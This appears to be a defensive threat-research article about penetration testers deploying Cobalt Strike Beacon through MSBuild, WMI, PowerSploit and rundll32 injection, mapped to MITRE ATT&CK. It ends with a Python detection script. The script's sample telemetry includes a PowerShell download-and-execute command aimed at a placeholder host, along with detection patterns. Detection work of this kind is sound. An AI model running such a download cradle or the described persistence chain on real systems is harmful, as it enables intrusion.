Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon provides the attacker with a wealth of functionality, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS and SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Cobalt Strike threat emulation framework lets legitimate penetration testers emulate threat actors. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable. However, the methods used to access the environment often differ. Threat actors typically use malware to gain initial access to the network and subsequently deploy Cobalt Strike. Penetration testers are often granted access to internal networks and systems so they can test the security and response of the enterprise. As a result, the penetration testers can bypass endpoint countermeasures and security controls that typically detect the phishing or malware activity that threat actors use for initial access. Legitimate testing typically assumes that the organization has already been breached.

In one engagement, Secureworks® Counter Threat Unit™ (CTU) researchers observed penetration testers leveraging local administrator access and the Microsoft Build Engine process to compile and execute a Cobalt Strike Beacon payload directly on the host. This process runs every time a user logs onto the system, injecting the Cobalt Strike Beacon payload into the userinit.exe user initialization process. The penetration testers then used Cobalt Strike Beacon to execute the PowerSploit exploitation scripting tool's "Install-ServiceBinary" function to obtain SYSTEM-level privileges. The observed PowerShell commands used the "-nop -exec bypass -EncodedCommand" parameters followed by a Base64-encoded command, which revealed that they were launched from Cobalt Strike Beacon. The penetration testers deployed Cobalt Strike Beacon to other hosts in the environment. They then used the Rundll32 execution utility to inject shellcode into the svchost.exe service host process on those systems. This technique enabled them to perform remote code execution on the systems via the Windows Management Instrumentation (WMI) service.

They used WMI to create persistence via a Microsoft Build Engine service that compiles and executes Cobalt Strike Beacon on these hosts. This action immediately provided the penetration testers with widespread access to the network. These techniques are not common in enterprise environments. For example, it is not typical developer behavior to compile binaries as a service that are executed every time a user logs in. Nor is it common for developers to compile and execute binaries over the network using WMI. These anomalous behaviors enable CTU™ researchers to develop countermeasures that can reliably detect the abuse of legitimate Windows utilities for nefarious purposes. Table 1 maps the observed penetration testing techniques to the MITRE ATT&CK® framework.

Table 1. Observed techniques mapped to MITRE ATT&CK:
Remote Services: SMB/Windows Admin Shares
Process Injection: Proc Memory
Native API
Command and Scripting Interpreter: PowerShell
Create or Modify System Process: Windows Service
Trusted Developer Utilities Proxy Execution: MSBuild
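As an added illustration, not code from the Secureworks article or from Cobalt Strike, the Python below turns the three anomalous behaviors described above into detection checks run over constructed sample telemetry: it decodes the Base64 (UTF-16LE) payload behind a PowerShell "-nop -exec bypass -EncodedCommand" launch, flags MSBuild.exe whose parent is the WMI provider host or the service control manager, and flags rundll32.exe creating a thread in svchost.exe. The event field names, image paths, parent processes and the sample payload are assumptions modelled on Sysmon process-creation and CreateRemoteThread records, not values taken from the page.

```python
import base64
import ntpath
import re
# Constructed sample telemetry (not from the page), modelled on Sysmon process-creation and
# CreateRemoteThread records; image paths, parents and field names are assumptions.
DECODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(DECODED_PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "powershell.exe -nop -exec bypass -EncodedCommand " + ENCODED},
    {"type": "process_create", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"MSBuild.exe C:\Users\Public\build.xml"},
    {"type": "process_create", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",  # ordinary developer build
     "command_line": r"MSBuild.exe C:\src\app.csproj"},
    {"type": "remote_thread", "source_image": r"C:\Windows\System32\rundll32.exe",
     "target_image": r"C:\Windows\System32\svchost.exe"},
]
# -EncodedCommand (or its short forms -enc / -e) followed by a Base64 blob.
ENC_RE = re.compile(r"(?i)-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]{16,})")
def base(path): return ntpath.basename(path).lower()  # case-insensitive image name

def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None

def analyze(events):
    # Run the three behavioural checks over telemetry records and return the findings.
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            img, parent, cmd = base(ev["image"]), base(ev["parent_image"]), ev["command_line"]
            # 1. PowerShell started with -nop and -exec bypass plus an encoded command.
            if img == "powershell.exe" and re.search(r"(?i)-nop\b.*-exec(?:utionpolicy)?\s+bypass", cmd):
                findings.append({"rule": "ps_encoded_bypass", "decoded": decode_encoded_command(cmd)})
            # 2. MSBuild spawned by the WMI provider host (launched over WMI) or by services.exe (a service).
            if img == "msbuild.exe" and parent in ("wmiprvse.exe", "services.exe"):
                findings.append({"rule": "msbuild_wmi_or_service", "parent": parent})
        elif ev["type"] == "remote_thread":
            # 3. rundll32.exe creating a thread inside svchost.exe, the injection path observed.
            if base(ev["source_image"]) == "rundll32.exe" and base(ev["target_image"]) == "svchost.exe":
                findings.append({"rule": "rundll32_inject_svchost"})
    return findings
```

The benign MSBuild record launched from devenv.exe produces no finding, which is the point of keying the MSBuild rule on the parent process rather than on MSBuild itself.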